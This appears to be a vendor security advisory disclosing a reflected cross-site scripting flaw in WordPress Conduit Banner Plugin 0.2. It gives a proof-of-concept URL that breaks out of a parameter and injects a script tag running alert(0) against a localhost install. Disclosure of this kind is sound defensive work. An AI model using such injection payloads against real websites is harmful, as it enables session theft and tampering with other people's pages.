Home
Consulting
Advisories
Software
Articles
Contact

WordPress Conduit Banner Plugin 0.2 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in WordPress Conduit Banner Plugin 0.2 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/wordpress/wp-content/plugins/conduit-banner-selector/conduit-banner-selector-banners.php?category-field-id=&category-id=120x240&page=&banner-index-field-id=')"/><script>alert(0)</script>


Copyright © 2018 AutoSec Tools LLC